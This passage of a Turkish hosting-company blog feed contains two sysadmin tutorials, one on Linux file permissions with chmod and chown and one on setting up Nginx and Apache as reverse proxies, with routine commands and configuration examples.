<p><strong>chmod</strong> komutu, bir dosya veya dizinin erişim izinlerini değiştirmek için kullanılır. chmod ile izinleri değiştirmek için iki farklı yöntem vardır:</p>



<h4 class="wp-block-heading">1. Sayısal (Oktal) Yöntem</h4>



<p>Linux izinleri, <strong>üçlü gruplar halinde 0 ile 7 arasında değişen sayılarla</strong> ifade edilir:</p>



<ul class="wp-block-list">
<li><strong>4</strong> = Okuma (r)</li>



<li><strong>2</strong> = Yazma (w)</li>



<li><strong>1</strong> = Çalıştırma (x)</li>



<li><strong>0</strong> = İzin yok</li>
</ul>



<p>İzinler şu şekilde hesaplanır:</p>



<figure class="wp-block-table"><table class="has-fixed-layout"><thead><tr><th>İzinler</th><th>Sayısal Değer</th></tr></thead><tbody><tr><td>&#8212;</td><td>0</td></tr><tr><td>&#8211;x</td><td>1</td></tr><tr><td>-w-</td><td>2</td></tr><tr><td>-wx</td><td>3</td></tr><tr><td>r&#8211;</td><td>4</td></tr><tr><td>r-x</td><td>5</td></tr><tr><td>rw-</td><td>6</td></tr><tr><td>rwx</td><td>7</td></tr></tbody></table></figure>



<p>Örnek:<br>Bir dosyaya sahip için tam yetki (rwx = 7), grup için okuma-yazma (rw- = 6), diğerleri için yalnızca okuma (r&#8211; = 4) yetkisi vermek için:</p>



<pre class="wp-block-code"><code>chmod 764 dosya.txt
</code></pre>



<p>Bu komut, izinleri şu hale getirir: <code>-rwxrw-r--</code></p>



<h4 class="wp-block-heading">2. Sembolik (Harf) Yöntemi</h4>



<p>Dosya izinlerini kullanıcı kategorilerine göre değiştirmek için <code>u</code> (owner), <code>g</code> (group) ve <code>o</code> (others) sembolleri kullanılır.</p>



<p>Örnek:<br>Bir dosyaya sahip için çalıştırma yetkisi eklemek:</p>



<pre class="wp-block-code"><code>chmod u+x dosya.txt
</code></pre>



<p>Grup için okuma yetkisini kaldırmak:</p>



<pre class="wp-block-code"><code>chmod g-r dosya.txt
</code></pre>



<hr class="wp-block-separator has-alpha-channel-opacity" />



<h3 class="wp-block-heading">chown Komutu ile Sahiplik Değiştirme</h3>



<p><strong>chown</strong> komutu, bir dosya veya dizinin sahibini değiştirmek için kullanılır.</p>



<p><strong>Temel Kullanım:</strong></p>



<pre class="wp-block-code"><code>chown yeni_sahip dosya.txt
</code></pre>



<p>Bu komut, dosyanın sahibini değiştirir.</p>



<p><strong>Grubu Değiştirmek İçin:</strong></p>



<pre class="wp-block-code"><code>chown :yeni_grup dosya.txt
</code></pre>



<p>Bu komut, dosyanın yalnızca grup sahipliğini değiştirir.</p>



<p><strong>Sahip ve Grubu Birlikte Değiştirmek İçin:</strong></p>



<pre class="wp-block-code"><code>chown yeni_sahip:yeni_grup dosya.txt
</code></pre>



<p><strong>Tüm Dizini ve İçindekileri Kapsayacak Şekilde Değiştirmek İçin:</strong></p>



<pre class="wp-block-code"><code>chown -R yeni_sahip:yeni_grup dizin/
</code></pre>



<p><code>-R</code> parametresi, dizinin içindeki tüm dosya ve alt dizinleri de kapsar.</p>



<hr class="wp-block-separator has-alpha-channel-opacity" />



<h3 class="wp-block-heading">chmod ve chown ile Güvenlik Önlemleri</h3>



<p>Linux sistem güvenliğinde izinler önemli bir rol oynar. İşte dikkat edilmesi gereken bazı noktalar:</p>



<ol class="wp-block-list">
<li><strong>777 İzni Vermeyin</strong>: <code>chmod 777 dosya.txt</code> Bu, herkesin dosyayı okuma, yazma ve çalıştırma yetkisine sahip olmasına neden olur, güvenlik açığı oluşturur.</li>



<li><strong>Önemli Dosyalara Yalnızca Sahip Yetki Versin</strong>: <code>chmod 600 önemli_dosya.txt</code> Bu, yalnızca dosyanın sahibinin okuma ve yazma yetkisine sahip olmasını sağlar.</li>



<li><strong>Kritik Sistem Dosyalarının Sahipliği Değiştirilmemeli</strong><br>Yanlışlıkla <code>/etc/passwd</code> veya <code>/etc/shadow</code> gibi sistem dosyalarının sahipliğini değiştirmek, sistemin çalışmasını bozabilir.</li>
</ol>



<hr class="wp-block-separator has-alpha-channel-opacity" />



<h3 class="wp-block-heading">Sonuç</h3>



<p>Linux’un izin yönetimi, sistemin güvenliğini ve kullanıcı erişim kontrolünü sağlamak için kritik bir bileşendir. <strong>chmod</strong> komutu ile dosya ve dizinlerin erişim izinleri düzenlenebilirken, <strong>chown</strong> komutu ile sahiplik değiştirilebilir. Güçlü bir güvenlik politikası oluşturmak için bu komutların bilinçli bir şekilde kullanılması gerekir.</p>



<p>Eğer bir Linux sunucu yönetiyorsanız, dosya ve dizin izinlerini dikkatlice yapılandırarak güvenliği artırabilirsiniz.</p>
<p><a rel="nofollow" href="https://www.cenuta.com/blog/linux-permission-izin-sistemi-nedir-chmod-ve-chown-komutlari-ile-yetkilendirme/" data-wpel-link="exclude">Linux Permission (İzin) Sistemi Nedir? chmod ve chown Komutları ile Yetkilendirme</a> yazısı ilk önce <a rel="nofollow" href="https://www.cenuta.com/blog" data-wpel-link="exclude">Cenuta Blog</a> üzerinde ortaya çıktı.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Reverse Proxy Nedir? Nginx ve Apache ile Reverse Proxy Kurulumu</title>
		<link>https://www.cenuta.com/blog/reverse-proxy-nedir-nginx-ve-apache-ile-reverse-proxy-kurulumu/</link>
		
		<dc:creator><![CDATA[Ömer Yüksel]]></dc:creator>
		<pubDate>Fri, 14 Mar 2025 04:25:45 +0000</pubDate>
				<category><![CDATA[Sunucu]]></category>
		<guid isPermaLink="false">https://www.cenuta.com/blog/?p=22942</guid>

					<description><![CDATA[<p>Reverse proxy, istemcilerden gelen talepleri alarak asıl sunucuya ileten ve<a href="https://www.cenuta.com/blog/reverse-proxy-nedir-nginx-ve-apache-ile-reverse-proxy-kurulumu/" data-wpel-link="exclude">...</a></p>
<p><a rel="nofollow" href="https://www.cenuta.com/blog/reverse-proxy-nedir-nginx-ve-apache-ile-reverse-proxy-kurulumu/" data-wpel-link="exclude">Reverse Proxy Nedir? Nginx ve Apache ile Reverse Proxy Kurulumu</a> yazısı ilk önce <a rel="nofollow" href="https://www.cenuta.com/blog" data-wpel-link="exclude">Cenuta Blog</a> üzerinde ortaya çıktı.</p>
]]></description>
										<content:encoded><![CDATA[
<p>Reverse proxy, istemcilerden gelen talepleri alarak asıl sunucuya ileten ve ardından gelen yanıtları istemcilere döndüren bir ara sunucudur. Web trafiğini yönlendirme, yük dengeleme, güvenlik ve önbellekleme gibi birçok avantaj sunar. Günümüzde yaygın olarak kullanılan Nginx ve Apache, reverse proxy olarak yapılandırılabilir ve yüksek performanslı web uygulamaları için önemli bir rol oynar. Bu makalede, reverse proxy kavramını detaylı bir şekilde inceleyecek, Nginx ve Apache kullanarak nasıl reverse proxy kurulumu yapılacağını adım adım anlatacağız.</p>



<h3 class="wp-block-heading">Reverse Proxy Nedir?</h3>



<p>Reverse proxy, istemcilerden gelen HTTP ve HTTPS isteklerini alıp, bunları arka uçtaki sunuculara ileten bir ara sunucudur. Gelen yanıtlar, reverse proxy tarafından istemciye geri gönderilir. Reverse proxy’nin temel işlevleri şunlardır:</p>



<ul class="wp-block-list">
<li><strong>Yük Dengeleme</strong>: Trafiği birden fazla sunucuya bölerek daha verimli çalışmasını sağlar.</li>



<li><strong>Önbellekleme (Caching)</strong>: Statik içerikleri önbelleğe alarak performansı artırır.</li>



<li><strong>Güvenlik</strong>: IP adreslerini gizleyerek ve DDoS saldırılarını önleyerek güvenliği artırır.</li>



<li><strong>SSL Sonlandırma</strong>: HTTPS isteklerini işleyerek sunucu üzerindeki yükü hafifletir.</li>
</ul>



<h3 class="wp-block-heading">Nginx ile Reverse Proxy Kurulumu</h3>



<p>Nginx, yüksek performanslı bir web sunucusu ve reverse proxy olarak yaygın şekilde kullanılır. Nginx’i reverse proxy olarak kullanmak için aşağıdaki adımları takip edebilirsiniz.</p>



<h4 class="wp-block-heading">1. Nginx Kurulumu</h4>



<p>Öncelikle, Nginx’in sisteminize kurulu olup olmadığını kontrol edin. Kurulu değilse, şu komutlarla yükleyebilirsiniz:</p>



<p><strong>Ubuntu/Debian:</strong></p>



<pre class="wp-block-code"><code>sudo apt update
sudo apt install nginx -y
</code></pre>



<p><strong>CentOS/RHEL:</strong></p>



<pre class="wp-block-code"><code>sudo yum install epel-release -y
sudo yum install nginx -y
</code></pre>



<h4 class="wp-block-heading">2. Reverse Proxy Yapılandırması</h4>



<p>Nginx konfigürasyon dosyanızı düzenleyerek reverse proxy olarak çalışmasını sağlayabilirsiniz.</p>



<pre class="wp-block-code"><code>sudo nano /etc/nginx/sites-available/default
</code></pre>



<p>Aşağıdaki konfigürasyonu ekleyin:</p>



<pre class="wp-block-code"><code>server {
    listen 80;
    server_name example.com;

    location / {
        proxy_pass http://192.168.1.100:8080;
        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
    }
}
</code></pre>



<p>Bu yapılandırma, gelen HTTP isteklerini 192.168.1.100 IP adresindeki 8080 portuna yönlendirecektir.</p>



<h4 class="wp-block-heading">3. Nginx’i Yeniden Başlatma</h4>



<p>Yapılandırma değişikliklerini uygulamak için Nginx’i yeniden başlatın:</p>



<pre class="wp-block-code"><code>sudo systemctl restart nginx
</code></pre>



<h3 class="wp-block-heading">Apache ile Reverse Proxy Kurulumu</h3>



<p>Apache de reverse proxy olarak kullanılabilir. Apache üzerinde reverse proxy yapılandırmak için aşağıdaki adımları takip edebilirsiniz.</p>



<h4 class="wp-block-heading">1. Apache Kurulumu</h4>



<p>Eğer Apache sunucunuz yoksa, aşağıdaki komutlarla yükleyebilirsiniz:</p>



<p><strong>Ubuntu/Debian:</strong></p>



<pre class="wp-block-code"><code>sudo apt update
sudo apt install apache2 -y
</code></pre>



<p><strong>CentOS/RHEL:</strong></p>



<pre class="wp-block-code"><code>sudo yum install httpd -y
</code></pre>



<h4 class="wp-block-heading">2. Gerekli Modülleri Etkinleştirme</h4>



<p>Apache’yi reverse proxy olarak kullanabilmek için aşağıdaki modülleri etkinleştirin:</p>



<pre class="wp-block-code"><code>sudo a2enmod proxy
sudo a2enmod proxy_http
</code></pre>



<h4 class="wp-block-heading">3. Reverse Proxy Yapılandırması</h4>



<p>Apache konfigürasyon dosyanızı düzenleyerek reverse proxy ayarlarını yapın:</p>



<pre class="wp-block-code"><code>sudo nano /etc/apache2/sites-available/000-default.conf
</code></pre>



<p>Aşağıdaki satırları ekleyin:</p>



<pre class="wp-block-code"><code>&lt;VirtualHost *:80&gt;
    ServerName example.com

    ProxyPass / http://192.168.1.100:8080/
    ProxyPassReverse / http://192.168.1.100:8080/
&lt;/VirtualHost&gt;
</code></pre>



<p>Bu yapılandırma, gelen HTTP isteklerini belirtilen IP adresine yönlendirecektir.</p>



<h4 class="wp-block-heading">4. Apache’yi Yeniden Başlatma</h4>



<p>Değişiklikleri uygulamak için Apache’yi yeniden başlatın:</p>



<pre class="wp-block-code"><code>sudo systemctl restart apache2
</code></pre>



<h3 class="wp-block-heading">Reverse Proxy Kullanmanın Avantajları</h3>



<p>Reverse proxy kullanmanın bazı temel avantajları şunlardır:</p>



<ul class="wp-block-list">
<li><strong>Güvenlik</strong>: Sunucu IP adreslerini gizleyerek saldırılara karşı koruma sağlar.</li>



<li><strong>Performans</strong>: Önbellekleme ve yük dengeleme ile daha hızlı yanıt süreleri sunar.</li>



<li><strong>SSL Yönetimi</strong>: SSL sonlandırma işlemlerini yöneterek sunucu yükünü azaltır.</li>



<li><strong>Trafik Yönlendirme</strong>: Gelen istekleri farklı arka uç sunucularına yönlendirerek esneklik sağlar.</li>
</ul>



<h3 class="wp-block-heading">Sonuç</h3>



<p>Reverse proxy, özellikle büyük ölçekli web uygulamalarında performansı artırmak ve güvenliği sağlamak için kritik bir bileşendir. Nginx ve Apache gibi popüler web sunucularını reverse proxy olarak yapılandırarak yük dengeleme, önbellekleme ve güvenlik avantajlarından faydalanabilirsiniz. Bu rehberde, reverse proxy’nin ne olduğunu, nasıl çalıştığını ve Nginx ve Apache ile nasıl yapılandırılacağını detaylı bir şekilde ele aldık.</p>
<p><a rel="nofollow" href="https://www.cenuta.com/blog/reverse-proxy-nedir-nginx-ve-apache-ile-reverse-proxy-kurulumu/" data-wpel-link="exclude">Reverse Proxy Nedir? Nginx ve Apache ile Reverse Proxy Kurulumu</a> yazısı ilk önce <a rel="nofollow" href="https://www.cenuta.com/blog" data-wpel-link="exclude">Cenuta Blog</a> üzerinde ortaya çıktı.</p>
]]></content:encoded>
					
		
		
			</item>
	</channel>
</rss>
